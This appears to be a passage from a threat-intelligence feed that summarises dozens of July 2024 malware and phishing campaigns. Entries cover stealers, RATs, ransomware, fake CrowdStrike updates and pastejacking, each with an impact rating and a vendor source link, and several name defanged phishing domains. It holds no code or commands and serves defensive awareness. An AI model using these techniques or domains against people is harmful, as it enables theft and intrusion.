In 2023, security vendors detected a NetSupport RAT campaign that employed fake browser updates on hijacked websites to distribute a stager, which performs a PowerShell-based installation of the NetSupport Manager agent. By January 2024, the obfuscation techniques in its JavaScript payload had advanced, and changes were seen in the paths used to install the agent. Cisco Talos conducted an in-depth analysis, identified the various obfuscation and evasion techniques used throughout the campaign, and created detections to protect users.
Source: https://blog.talosintelligence.com/detecting-evolving-threats-netsupport-rat/
2024-07-31
Google_Authenticator_Users_Targeted_by_Fake_Ad
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Google_Authenticator_Users_Targeted_by_Fake_Ad
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
Researchers from Malwarebytes have observed a Google ad that targets Google Authenticator users and tricks them into visiting a decoy website. An unknown individual impersonated Google to push malware disguised as a legitimate Google product.
Source: https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator
2024-07-31
Malicious_Packages_Hidden_in_PyPI
LOW
+
Intel Source:
Fortinet
Intel Name:
Malicious_Packages_Hidden_in_PyPI
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
Researchers from FortiGuard have discovered a malicious PyPI package which can affect any platform using PyPI packages. This malicious package is designed to steal sensitive information like passwords and cookies from web browsers. The package contains a URL that downloads various files, including an executable file packed with PyInstaller. This can lead to unauthorized access to user accounts and the theft of personal data.
Source: https://www.fortinet.com/blog/threat-research/malicious-packages-hidden-in-pypl
2024-07-31
Phishing_Continues_via_ModiLoader
LOW
+
Intel Source:
ESET
Intel Name:
Phishing_Continues_via_ModiLoader
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
ESET researchers have observed that in May 2024, phishing attacks in Poland, Romania, and Italy took an interesting twist: they switched from AceCryptor to ModiLoader. ESET also spotted nine notable ModiLoader campaigns phishing small and medium-sized businesses, seven of them in Poland. The malware spread by ModiLoader consisted of Rescoms, Agent Tesla, and Formbook. Attackers leveraged compromised email accounts and company servers to distribute malicious emails, host malware, and gather stolen data.
Source: https://www.welivesecurity.com/en/eset-research/phishing-targeting-polish-smbs-continues-modiloader/
2024-07-31
DeerStealer_Campaign
LOW
+
Intel Source:
Any.Run
Intel Name:
DeerStealer_Campaign
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
Researchers at Any.Run discovered a malware campaign called DeerStealer. The malware is spread through fake Google Authenticator websites that look like real Google pages. When users click the download button, their information (IP address and country) is sent to a Telegram bot named Tuk-tuk, and the malware is downloaded from GitHub. The downloaded file launches the final malicious program, which runs directly in memory without being saved to disk.
Source: https://any.run/cybersecurity-blog/deerstealer-campaign-analysis/
2024-07-31
DEVPOPPER_Campaign
MEDIUM
+
Intel Source:
Securonix
Intel Name:
DEVPOPPER_Campaign
Date of Scan:
2024-07-31
Impact:
MEDIUM
Summary:
Securonix threat researchers have identified a malware campaign called DEV#POPPER, linked to North Korea, that targets software developers. In this campaign, attackers pose as job interviewers and send candidates a ZIP file for a coding assignment. When the user runs the files, the malware identifies the user's operating system and contacts a remote server to steal data. The campaign affects victims in South Korea, North America, Europe, and the Middle East, targeting Windows, Linux, and macOS systems. The malware is hidden among legitimate files, making it hard to detect.
Source: https://www.securonix.com/blog/research-update-threat-actors-behind-the-devpopper-campaign-have-retooled-and-are-continuing-to-target-software-developers-via-social-engineering/
2024-07-31
Exploitation_of_Sora_AI_to_Spread_Malware
LOW
+
Intel Source:
Cyble
Intel Name:
Exploitation_of_Sora_AI_to_Spread_Malware
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
Cyble researchers have identified that cybercriminals are exploiting Sora AI branding to create fake phishing sites, even before Sora's official release. These criminals use compromised social media accounts to promote the fake sites, making them seem legitimate. Researchers also found phishing sites named openai-soravideo[.]com and sora-OpenAI-generation[.]com, along with fake Sora AI pages and ZIP files containing malicious scripts that steal sensitive information such as login credentials, cookies, and browser data.
Source: https://cyble.com/blog/threat-actors-exploit-sora-ai-themed-branding-to-spread-malware/
2024-07-31
Analysis_of_AzzaSec_Ransomware
LOW
+
Intel Source:
ThreatMon
Intel Name:
Analysis_of_AzzaSec_Ransomware
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
AzzaSec Ransomware, created by the AzzaSec hacktivist group, is a serious cyber threat due to its sophistication and its evasion of detection. It can be delivered via compromised Windows servers or phishing emails with an attached PDF dropper. Once activated, it encrypts files using AES, appends the extension AzzaSec_Encryptor, and targets 120 file formats. To avoid detection, the ransomware uses several anti-detection techniques and maintains persistence by placing itself in the Startup directory. Victims are asked for a ransom of $600 and are further pressured by a changed system background and threatening audio messages.
Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/AzzaSec%20Ransomware%20Technical%20Malware%20Analysis%20Report.pdf.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1721285822323.1722410051589.4&__hssc=205617164.2.1722410051589&__hsfp=1054730769
2024-07-31
Donot_Group_Carry_Out_Phishing_Attacks
LOW
+
Intel Source:
CTFIOT
Intel Name:
Donot_Group_Carry_Out_Phishing_Attacks
Date of Scan:
2024-07-31
Impact:
LOW
Summary:
During routine threat hunting, CTFIOT analysts came across a sample associated with phishing attempts. It was disguised as "The seventh COMAC International Science and Technology Innovation Week", sponsored by Commercial Aircraft Corporation of China Ltd. and others. A homology analysis of the sample showed that it is linked to the Donot APT group.
Source: https://www.ctfiot.com/196353.html
2024-07-31
The_XDSpy_Group_Attacks
MEDIUM
+
Intel Source:
F.A.C.C.T
Intel Name:
The_XDSpy_Group_Attacks
Date of Scan:
2024-07-31
Impact:
MEDIUM
Summary:
A cyberespionage group known as XDSpy recently targeted organizations in Russia and Transnistria, Moldova, with a new malware variant. The group sent out phishing emails with links to archives that contained legitimate executable files used to install the XDSpy.DSDownloader tool, with which they could secretly run malicious code. The Russian cybersecurity firm F.A.C.C.T. found these attacks but has not said whether any systems were breached or any information was stolen.
Source: https://habr.com/ru/companies/f_a_c_c_t/news/831420/
2024-07-30
A_Deep_Dive_into_Donot_Threat_Actor
LOW
+
Intel Source:
Rewterz
Intel Name:
A_Deep_Dive_into_Donot_Threat_Actor
Date of Scan:
2024-07-30
Impact:
LOW
Summary:
Rewterz researchers have identified a threat actor called APT-C-35, also known as the Donot APT Group, which has been active since 2013. The group is involved in cyber espionage and intellectual property theft, targeting government and military organizations as well as companies in the aerospace, defense, and high-tech sectors, primarily in South Asia but also in the US and Europe. Its tactics include spear-phishing emails, custom malware, and detection-avoidance techniques such as encryption and fileless malware. The Donot APT Group is known to be well-funded, well-resourced, and highly skilled.
Source: https://www.rewterz.com/threat-advisory/donot-apt-group-targeting-pakistan-active-iocs
2024-07-30
Multiple_Malware_target_Polish_Business
LOW
+
Intel Source:
ESET
Intel Name:
Multiple_Malware_target_Polish_Business
Date of Scan:
2024-07-30
Impact:
LOW
Summary:
ESET researchers have uncovered a large phishing campaign targeting small and medium-sized businesses, primarily in Poland but also in Italy and Romania. The attacks spread malware such as Agent Tesla, Formbook, and Remcos RAT using compromised email accounts and company servers. The phishing emails carried RAR or ISO attachments to install the malware. The attackers use the DBatLoader tool to deliver the malware; this tool downloads further malware from sources such as Microsoft OneDrive or compromised company servers. The malware steals sensitive information to support future attacks.
Source: https://www.welivesecurity.com/en/eset-research/phishing-targeting-polish-smbs-continues-modiloader/
2024-07-30
A_Python_Based_Mint_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
A_Python_Based_Mint_Stealer
Date of Scan:
2024-07-30
Impact:
LOW
Summary:
The Mint Stealer malware variant has been extensively analyzed by the CYFIRMA research team. This information stealer is designed to capture important data and operates under a malware-as-a-service (MaaS) model. Mint Stealer uses sophisticated evasion techniques and was built with the Nuitka Python compiler to offer more functionality through Python's dynamically loaded modules.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_mint-stealer-study-of-a-python-based-information-activity-7223932541236338691-6jTU?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-07-30
Investigating_Zloader_and_Silentnight_Malware
LOW
+
Intel Source:
Walmart Global Tech Blog
Intel Name:
Investigating_Zloader_and_Silentnight_Malware
Date of Scan:
2024-07-30
Impact:
LOW
Summary:
Researchers at Walmart Global Tech have investigated a new variant of Zloader/Silentnight that exposes a hidden PowerShell backdoor and VBS downloader. This malware variant, which CISA has openly linked to Black Basta, likely works alongside the new Zloader variant. The PowerShell backdoor appears intended to extend access through reconnaissance activities and to deploy other malware samples, including Zloader.
Source: https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850
2024-07-29
Malicious_PyPI_Package_Targeting_MacOS
MEDIUM
+
Intel Source:
Checkmark
Intel Name:
Malicious_PyPI_Package_Targeting_MacOS
Date of Scan:
2024-07-29
Impact:
MEDIUM
Summary:
Checkmarx researchers have found that the Python package "lr-utils-lib" included undetected harmful code during a recent investigation. Upon installation, the code targets macOS systems and tries to send Google Cloud Platform credentials to a remote server in an attempt to steal them. They also found a link to an impostor LinkedIn profile purporting to be the CEO of Apex Companies, LLC, named "Lucid Zenith," suggesting the possibility of social engineering.
Source: https://checkmarx.com/blog/malicious-python-package-targets-macos-developers-to-access-their-gcp-accounts/
2024-07-29
CyberGate_Malware
LOW
+
Intel Source:
Cyber5w
Intel Name:
CyberGate_Malware
Date of Scan:
2024-07-29
Impact:
LOW
Summary:
Researchers from Subex Secure have identified a malware called CyberGate Remote Access Trojan (RAT). This malware allows attackers to remotely take control of a victim's computer from anywhere in the world. Attackers use this to steal private information like passwords and files, and it might also be used to install other malicious software on the compromised systems.
Source: https://blog.cyber5w.com/cybergate-malware-analysis
2024-07-29
A_Phishing_Campaign_Using_Discord_CDN
LOW
+
Intel Source:
Threatdown
Intel Name:
A_Phishing_Campaign_Using_Discord_CDN
Date of Scan:
2024-07-29
Impact:
LOW
Summary:
Researchers from Threatdown have observed a new phishing campaign that uses Discord’s Content Delivery Network (CDN) infrastructure to deliver malicious payloads. Researchers found the subsequent chain of malicious activity; they alerted the client, who quickly isolated the endpoint from the network.
Source: https://www.threatdown.com/blog/new-phishing-campaign-uses-discord-for-payload-delivery/
2024-07-29
Exploiting_Fake_DICOM_Viewer_Hack
LOW
+
Intel Source:
Huntress
Intel Name:
Exploiting_Fake_DICOM_Viewer_Hack
Date of Scan:
2024-07-29
Impact:
LOW
Summary:
Researchers from Huntress have found that hackers are targeting medical organisations by misleading users during the installation of a trusted program. Instead of downloading the legitimate software, users are tricked into downloading a malicious version. The Huntress researchers observed unusual secure-connection (SSH) activity originating from a DICOM viewer installer, a program used to view medical images. While the viewer itself seemed genuine, the SSH activity raised suspicions.
Source: https://www.huntress.com/blog/when-trust-becomes-a-trap-how-huntress-foiled-a-medical-software-update-hack
2024-07-29
Analysis_of_Russian_Doppelganger_Info_Operations
MEDIUM
+
Intel Source:
Harfanglab
Intel Name:
Analysis_of_Russian_Doppelganger_Info_Operations
Date of Scan:
2024-07-29
Impact:
MEDIUM
Summary:
Harfanglab researchers have explored Russian-led Doppelganger information operations from early June to late July 2024, a period shaped by the sudden French snap general election. Doppelganger operations manipulate social networks and digital media by posing as popular news websites to promote Russia's interests. The term has been widely covered by public sources in both government and the private sector since it was first made public in 2022. The paper offers a threat intelligence view of these operations, concentrating on their strategies, infrastructure, and motivations in Europe and the USA, with a special focus on their impact on France in the context of the election.
Source: https://harfanglab.io/en/insidethelab/doppelganger-operations-europe-us/
2024-07-29
SideWinder_New_Infrastructure
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
SideWinder_New_Infrastructure
Date of Scan:
2024-07-29
Impact:
MEDIUM
Summary:
BlackBerry Researchers have identified a new campaign by the nation-state threat actor SideWinder, targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. SideWinder has upgraded its infrastructure and is using new tactics to compromise victims. The campaign targets Pakistan, Egypt, and Sri Lanka, with further targeting in Bangladesh, Myanmar, Nepal, and the Maldives. The attack involves spear-phishing emails containing malicious documents designed to evoke strong emotions, causing the recipient to download and open the infected files.
Source: https://blogs.blackberry.com/en/2024/07/sidewinder-targets-ports-and-maritime-facilities-in-the-mediterranean-sea
2024-07-29
EchoSpoofing_Phishing_Campaign
LOW
+
Intel Source:
Guardio Labs
Intel Name:
EchoSpoofing_Phishing_Campaign
Date of Scan:
2024-07-29
Impact:
LOW
Summary:
Guardio Labs has discovered a critical exploit in Proofpoint’s email protection service, dubbed "EchoSpoofing," allowing threat actors to send millions of perfectly spoofed phishing emails from high-profile brands. These emails, leveraging Proofpoint’s infrastructure and authenticated with SPF and DKIM signatures, bypassed major security protections to deceive recipients and steal credit card details. The campaign involved abusing Microsoft Office365 accounts and Proofpoint's email relay servers. Upon discovery, Guardio collaborated with Proofpoint to mitigate the issue and protect their customers.
Source: https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6
2024-07-29
Unmasking_SnakeKeylogger_Malware
LOW
+
Intel Source:
ASEC
Intel Name:
Unmasking_SnakeKeylogger_Malware
Date of Scan:
2024-07-29
Impact:
LOW
Summary:
Researchers from ASEC have observed a malware campaign spreading through email. The malware, named SnakeKeylogger, is an infostealer written in .NET and is characterized by data exfiltration methods such as email, FTP, SMTP, or Telegram. The malware is stored encrypted in a file within the %Temp% directory, and the attacker uses different methods to activate it depending on the system.
Source: https://asec.ahnlab.com/ko/68461/
2024-07-29
UNC4393_SILENTNIGHT
MEDIUM
+
Intel Source:
Google Cloud
Intel Name:
UNC4393_SILENTNIGHT
Date of Scan:
2024-07-29
Impact:
MEDIUM
Summary:
Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the identification of UNC4393, the primary user of BASTA ransomware. This financially motivated threat cluster has targeted over 40 organizations across various industries, recently including healthcare. UNC4393 typically gains initial access via phishing emails that deliver QAKBOT, and has evolved from using readily available tools to developing custom malware. They operate a private affiliate model for BASTA ransomware, focusing on strategic partnerships for initial access rather than public recruitment. UNC4393 has been observed deploying a variety of malware, including SYSTEMBC, KNOTWRAP, KNOTROCK, DAWNCRY, PORTYARD, and COGSCAN, and has a rapid operational tempo with a median time to ransom of 42 hours. They have shifted from manual ransomware deployment to using tools like KNOTROCK to streamline operations.
Source: https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight/
2024-07-29
OneDrive_Pastejacking
MEDIUM
+
Intel Source:
Trellix
Intel Name:
OneDrive_Pastejacking
Date of Scan:
2024-07-29
Impact:
MEDIUM
Summary:
Researchers at Trellix have identified a sophisticated phishing and downloader campaign targeting Microsoft OneDrive users, leveraging social engineering tactics to deceive users into executing a PowerShell script and compromising their systems. The attack begins with an email containing an HTML file that, when opened, displays a fake Microsoft OneDrive page with an error message urging the user to update their DNS cache. Clicking the "How to fix" button initiates a series of steps leading the user to execute a Base64 encoded command via PowerShell, ultimately downloading and executing malicious files.
Source: https://www.trellix.com/blogs/research/onedrive-pastejacking/
2024-07-26
IT_Crash_Fallout
HIGH
+
Intel Source:
Morphisec
Intel Name:
IT_Crash_Fallout
Date of Scan:
2024-07-26
Impact:
HIGH
Summary:
Researchers from Morphisec have found that a recent faulty configuration file in CrowdStrike's Falcon platform caused a significant IT disruption, making millions of Windows machines unusable. This multi-day outage affected crucial sectors such as airlines, banks, and hospitals. The incident highlighted the significant responsibility and potential risks of allowing third-party security solutions to access the kernel.
Source: https://blog.morphisec.com/blast-radius-fallout-strengthening-cyber-resilience-after-the-largest-it-crash
2024-07-26
Activity_of_UAC_0102_Group
LOW
+
Intel Source:
CERT-UA
Intel Name:
Activity_of_UAC_0102_Group
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
CERT-UA researchers have found the UAC-0102 group distributing emails with attachments in the form of archives containing an HTML file. Opening the file redirects the user to a web resource that imitates the web page of the UKR.NET service. If the user enters their login and password, the authentication data is sent to the attackers, and a decoy document is downloaded to the victim's computer as bait.
Source: https://cert.gov.ua/article/6280183
2024-07-26
Hackers_Exploiting_Selenium_Grid
LOW
+
Intel Source:
Wiz blog
Intel Name:
Hackers_Exploiting_Selenium_Grid
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
Wiz researchers have observed an ongoing threat campaign called "SeleniumGreed" in which attackers exploit exposed Selenium Grid services to mine cryptocurrency. They use Selenium WebDriver features to run Python scripts that download an XMRig miner.
Source: https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps
2024-07-26
LummaC2_Malware_Update
LOW
+
Intel Source:
ASEC
Intel Name:
LummaC2_Malware_Update
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
ASEC researchers have observed LummaC2, an information-stealing malware disguised as illegal software such as cracks, keygens, and game hacks. It spreads through websites, YouTube, LinkedIn, and search engine ads that mimic pages for Notion, Slack, and Steam. It can be delivered as a single EXE file or as a compressed file containing a malicious DLL. LummaC2 has evolved dynamically, and its new version can use a legitimate website to change the C2 domain whenever the attacker wants.
Source: https://asec.ahnlab.com/en/68309/
2024-07-26
Exploiting_APT45
MEDIUM
+
Intel Source:
Google Cloud
Intel Name:
Exploiting_APT45
Date of Scan:
2024-07-26
Impact:
MEDIUM
Summary:
Mandiant researchers have observed that APT45 has been involved in various cyber operations that aligned with the shifting geopolitical interests of the North Korean state. Initially, APT45 focused on spying on government agencies and defense industries. Recently, they have shifted to financially-motivated operations, targeting the financial sectors.
Source: https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine
2024-07-26
Domain_Hosting_Pages_For_Paris_Olympics_Scams
LOW
+
Intel Source:
PaloAlto
Intel Name:
Domain_Hosting_Pages_For_Paris_Olympics_Scams
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
Researchers at PaloAlto have cautioned users about fake Paris 2024 Olympics scams. They uncovered a large number of domains, including recently registered ones, offering fake internet data giveaways. These scam pages request a phone number, trick victims into sharing the page with WhatsApp contacts, and promote further bogus surveys.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-25-Paris-2024-Olympics-scams.txt
2024-07-26
Malicious_LNK_Targeting_Financial_Entities
LOW
+
Intel Source:
ASEC
Intel Name:
Malicious_LNK_Targeting_Financial_Entities
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
ASEC researchers have identified a new campaign targeting domestic financial entities using malicious LNK files delivered through emails containing malicious URLs. The URL downloads a ZIP file named "Request for confirmation of project information in accordance with the request of financial authorities.zip". The malicious ZIP file contains a legitimate PDF and a fake Excel file. The PDF requests updates on cryptocurrency projects to lure users into opening the file, which hides PowerShell commands that are hard to detect. The scripts then steal user information, download further malicious files, and send the stolen data to a specific URL.
Source: https://asec.ahnlab.com/ko/68266/
2024-07-26
New_Phishing_Scam_Targeting_German_Customers
HIGH
+
Intel Source:
CrowdStrike
Intel Name:
New_Phishing_Scam_Targeting_German_Customers
Date of Scan:
2024-07-26
Impact:
HIGH
Summary:
CrowdStrike Intelligence has identified a spear-phishing campaign that distributes a counterfeit CrowdStrike Crash Reporter installer through a website impersonating a German organization. Notably, the website was registered with a subdomain registrar and appears to have been created on July 20, 2024, one day after an issue affecting Windows operating systems, traced to a single content update for CrowdStrike's Falcon sensor, was discovered and fixed.
Source: https://www.crowdstrike.com/blog/malicious-inauthentic-falcon-crash-reporter-installer-spearphishing/
2024-07-26
Gh0stGambit_A_New_Variant_of_Gh0stRAT
LOW
+
Intel Source:
Esentire
Intel Name:
Gh0stGambit_A_New_Variant_of_Gh0stRAT
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
Researchers from eSentire have discovered several Gh0st RAT infections originating from fake Chrome browser installer packages. These infections start with a new variant called Gh0stGambit, which is designed to secretly download and run encrypted malware. The malware is downloaded when users search for Chrome online and try to download a file named ChromeSetup.msi. The operation targets entities such as embassies, foreign ministries, government offices, and the Dalai Lama's Tibetan exile centers in India, London, and New York City.
Source: https://www.esentire.com/blog/a-dropper-for-deploying-gh0st-rat
2024-07-26
New_Variants_of_Golang_Based_Ransomhub_Ransomware
LOW
+
Intel Source:
PaloAlto
Intel Name:
New_Variants_of_Golang_Based_Ransomhub_Ransomware
Date of Scan:
2024-07-26
Impact:
LOW
Summary:
PaloAlto researchers have discovered new variations of Golang-based Ransomhub ransomware, which tout enhanced features such as quick encryption and avoiding VM shutdowns while using the same gobfuscate obfuscation approach as before.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-24-new-Ransomhub-verson-or-variant.txt
2024-07-25
Rhysida_Exploiting_Oyster_Backdoor
LOW
+
Intel Source:
Threatdown
Intel Name:
Rhysida_Exploiting_Oyster_Backdoor
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
Researchers from Threatdown have discussed the Rhysida ransomware group, which is exploiting a new variant of the Oyster backdoor, initially discovered by Rapid7 in late June 2024, that uses SEO-poisoned search results to trick users into downloading malicious installers. These installers masquerade as legitimate software, such as Google Chrome and Microsoft Teams, but instead drop the Oyster backdoor. On July 10, an Oyster backdoor was deployed on a customer endpoint, likely originating from a malicious IP scanner distributed via malvertising. The malicious DLL associated with this attack communicates with a domain that ThreatDown researchers identified as an Oyster C2 server.
Source: https://www.threatdown.com/blog/rhysida-using-oyster-backdoor-to-deliver-ransomware/
2024-07-25
Overview_of_Flame_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Overview_of_Flame_Stealer
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
A highly advanced malware dubbed Flame Stealer, first advertised on Telegram, is designed to avoid detection and steal sensitive data. It is written in C/C++, operates through Discord, and targets people in Portuguese-speaking communities. The malware collects autofill data, cookies, and session information from platforms such as Instagram, TikTok, Spotify, Roblox, and Discord. It uses DLL side-loading to run malicious payloads and achieves persistence through Windows start-up. It sends stolen data to a specified webhook, potentially giving the operator remote access to the stolen information.
Source: https://www.cyfirma.com/research/flame-stealer/
2024-07-25
Rising_of_AI_Driven_Threats
LOW
+
Intel Source:
Symantec
Intel Name:
Rising_of_AI_Driven_Threats
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
Researchers at Symantec have observed an increase in cyber attacks that make use of AI tools, specifically large language models (LLMs). These attacks often arrive as phishing emails with malicious file attachments. The files run AI-generated PowerShell scripts that download various malware families, including Rhadamanthys, NetSupport, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and Dunihi (H-Worm). The attacks target different sectors and often rely on urgent-looking phishing emails whose attachments download the malware.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm
2024-07-25
Fake_W2_Form_Delivers_Malware
LOW
+
Intel Source:
Rapid7
Intel Name:
Fake_W2_Form_Delivers_Malware
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
Rapid7 researchers have discovered a malware campaign targeting users searching for W2 forms on the Microsoft search engine Bing. In this campaign, attackers trick users into downloading JavaScript files that appear to be W2 forms from a fake IRS website. When users run these files, they execute a Microsoft Software Installer (MSI) package that contains the Brute Ratel badger. Once Brute Ratel executes, it downloads the Latrodectus malware, which allows attackers to control the compromised machine, execute remote commands, and install more malware.
Source: https://www.rapid7.com/blog/post/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/
2024-07-25
Onyx_Sleet
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Onyx_Sleet
Date of Scan:
2024-07-25
Impact:
MEDIUM
Summary:
Microsoft has reported on Onyx Sleet, a North Korean cyber threat actor active since 2014. The group conducts cyber espionage targeting the military, defense, and technology industries, primarily in India, South Korea, and the United States. Onyx Sleet uses a variety of custom and open-source tools, including remote access trojans (RATs) and exploits for known vulnerabilities. Its primary goal is intelligence gathering, but it has recently expanded into financial gain. Microsoft has collaborated with the FBI to track Onyx Sleet's activities, which led to a U.S. Department of Justice indictment of an individual linked to the group.
Source: https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/
2024-07-25
Accelerating_Malware_Analysis
LOW
+
Intel Source:
PaloAlto
Intel Name:
Accelerating_Malware_Analysis
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
PaloAlto researchers have discussed some of the ways security professionals analyze and prioritize multiple malware samples efficiently. Using tools such as malware configuration extractors (MCE), analysts can quickly identify malware families and extract crucial indicators of compromise (IoCs), making responders' work easier. The researchers also examined a sample and extracted its C2 server address; pivoting on this information revealed a Bitbucket repository hosting the second-stage payloads. Further inquiry uncovered ten additional samples hosted on and distributed from the same repository.
Source: https://unit42.paloaltonetworks.com/accelerating-malware-analysis/
2024-07-25
Xworm_Malware_Distributed_as_a_URL_File
LOW
Intel Source:
ASEC
Intel Name:
Xworm_Malware_Distributed_as_a_URL_File
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
ASEC researchers have identified that attackers mimicked PayPal and sent an email with a fake invoice attachment. The attachment contains a shortcut file called Payment_information.url that downloads further malicious files from a network shared folder. The downloaded content contains an executable carrying the Xworm malware. Xworm can replicate itself, execute itself, and communicate with C2 servers. It can perform various malicious actions such as downloading files, shutting down the PC, executing commands, DDoS attacks, keylogging, and screen capture.
Source: https://asec.ahnlab.com/ko/68115/
2024-07-25
Latrodectus_Loaded_by_Brute_Ratel_C4_Badger
LOW
Intel Source:
AnyRun
Intel Name:
Latrodectus_Loaded_by_Brute_Ratel_C4_Badger
Date of Scan:
2024-07-25
Impact:
LOW
Summary:
A recently found malware loader called Latrodectus could be the IcedID malware's potential successor. Similarities in development and behavior lead security researchers to believe that Latrodectus may have been developed by the same threat actor group that created IcedID. It is a loader used to infect a compromised system with more advanced types of malware.
Source: https://any.run/cybersecurity-blog/brute-ratel-c4-analysis/
2024-07-25
Fake_Crowdstrike_Update_Spread_Lumma_Stealer
HIGH
Intel Source:
CrowdStrike
Intel Name:
Fake_Crowdstrike_Update_Spread_Lumma_Stealer
Date of Scan:
2024-07-25
Impact:
HIGH
Summary:
Researchers from CrowdStrike have discovered a phishing domain, crowdstrike-office365[.]com, which pretends to be CrowdStrike. This site spreads malicious ZIP and RAR files containing an MSI installer. This installer runs the Lumma Stealer malware packed with CypherIt. The MSI installer shows a fake installation screen, then extracts and runs more malicious files, including an installer named SymposiumTaiwan.exe that uses complex tricks to hide its real code.
Source: https://www.crowdstrike.com/blog/lumma-stealer-with-cypherit-phishing-lure/
2024-07-24
Unveiling_the_Stargazers_Ghost_Network
MEDIUM
Intel Source:
CheckPoint
Intel Name:
Unveiling_the_Stargazers_Ghost_Network
Date of Scan:
2024-07-24
Impact:
MEDIUM
Summary:
Researchers from Check Point have discovered a network of GitHub accounts, dubbed the Stargazers Ghost Network, that distributes malware and malicious links via phishing repositories. This operation is called Distribution as a Service (DaaS) and allows attackers to spread malicious payloads by hiding them within phishing repositories that look like normal projects. Operating under the name Stargazer Goblin, the group behind this network uses tactics such as starring and forking repositories to make them look more credible. The list of distributed malware includes many families, such as Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.
Source: https://research.checkpoint.com/2024/stargazers-ghost-network/
2024-07-24
Malicious_Python_Script_Mouse_Logger
LOW
Intel Source:
ISC.SANS
Intel Name:
Malicious_Python_Script_Mouse_Logger
Date of Scan:
2024-07-24
Impact:
LOW
Summary:
Researchers at ISC.SANS note that keylogging is a popular malware feature because it can steal valuable information such as usernames and passwords typed on keyboards. During a recent analysis of SANSFIRE incident response data, for instance, they discovered a Python malware program that, apart from having common functionality such as a keylogger and screenshot grabber, also came with a new mouse logger. This means it tracks not only typed keys but also the mouse movements and clicks made by users.
Source: https://isc.sans.edu/diary/Mouse+Logger+Malicious+Python+Script/31106/
2024-07-24
Activity_of_UAC_0057_Group
LOW
Intel Source:
CERT-UA
Intel Name:
Activity_of_UAC_0057_Group
Date of Scan:
2024-07-24
Impact:
LOW
Summary:
CERT-UA researchers have observed increased activity from the UAC-0057 group between July 12 and 18, 2024. The group distributed the PICASSOLOADER malware through macro-enabled documents intended to install Cobalt Strike Beacon on victims' computers. Documents such as oborona.rar, Tax_2024.xls, and others included materials mainly related to the reform of local self-government bodies, taxation, and financial indicators; files connected with the USAID/DAI "HOVERLA" project were also identified among them. It is possible that project office specialists and workers within Ukrainian local self-governance systems were among the targets of interest.
Source: https://cert.gov.ua/article/6280159
2024-07-24
Fake_Crowdstrike_Update_Spread_Python_Info_Stealer
HIGH
Intel Source:
CrowdStrike
Intel Name:
Fake_Crowdstrike_Update_Spread_Python_Info_Stealer
Date of Scan:
2024-07-24
Impact:
HIGH
Summary:
CrowdStrike researchers have identified a malicious ZIP file called CrowdStrike Falcon.zip, which contains a Python-based info stealer called Connecio. Distribution of this stealer began just after the CrowdStrike incident. The ZIP file pretends to be a Falcon update and runs the Connecio information stealer, which collects system data, external IP addresses, and browser data. The stealer communicates with its control servers via URLs hosted on Pastebin.
Source: https://www.crowdstrike.com/blog/threat-actor-distributes-python-based-information-stealer/
2024-07-24
Qyad7_Botnet_Target_TP_Link_Routers
LOW
Intel Source:
Sekoia
Intel Name:
Qyad7_Botnet_Target_TP_Link_Routers
Date of Scan:
2024-07-24
Impact:
LOW
Summary:
Sekoia researchers uncovered the 7777 botnet also known as the Quad7 botnet. It uses compromised TP-Link routers to carry out slow brute force attacks on Microsoft 365 accounts worldwide. The botnet disables the routers' management interface to avoid detection and is linked to long-term business email compromise (BEC) cybercriminals, not APTs. It primarily performs password spraying instead of brute force attacks and targets a wide range of Microsoft 365 accounts. The Quad7 botnet mainly affects Bulgaria, France, Russia, the US, and Ukraine.
Source: https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/
2024-07-24
CrowdStrike_Outage_Updated_IOCs
HIGH
Intel Source:
ANY.RUN, Reliaquest, SOCRadar, Cyble
Intel Name:
CrowdStrike_Outage_Updated_IOCs
Date of Scan:
2024-07-24
Impact:
HIGH
Summary:
